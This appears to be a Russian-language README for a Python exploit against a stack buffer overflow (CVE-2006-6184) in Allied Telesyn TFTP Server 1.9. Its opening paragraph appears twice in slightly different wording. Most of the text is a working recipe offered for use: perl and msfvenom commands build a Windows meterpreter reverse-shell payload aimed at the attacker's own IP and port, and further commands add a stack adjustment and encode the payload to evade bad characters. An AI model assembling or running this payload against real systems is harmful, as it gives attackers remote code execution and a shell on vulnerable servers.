
Это автономный эксплойт на Python для CVE-2006-6184. Этот эксплойт вызывает переполнение буфера на основе стека в Allied Telesyn TFTP Server (AT-TFTP) 1.9 и, возможно, более ранних версиях, позволяя удаленным злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код.
Это автономный эксплойт на Python для CVE-2006-6184. Данный эксплойт вызывает переполнение буфера на основе стека в Allied Telesyn TFTP Server (AT-TFTP) версии 1.9 и, возможно, более ранних, что позволяет удалённым злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код.
Полезная нагрузка должна быть настроена с вашим IP-адресом и портом прослушивания, поэтому вам нужно сгенерировать её вручную. Для этого выполните следующие шаги:
1.) Введите следующее, чтобы создать hex-файл значения, которое нужно вычесть из указателя стека (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Затем используйте следующую команду для создания многоступенчатой полезной нагрузки meterpreter shell:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Затем объедините два только что созданных файла.
cat stackadj payload > shellcode
4.) Наконец, устраним "плохие" символы.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
Введите вывод в качестве значения переменной "payload". Возможно, потребуется запустить эксплойт несколько раз, чтобы он сработал.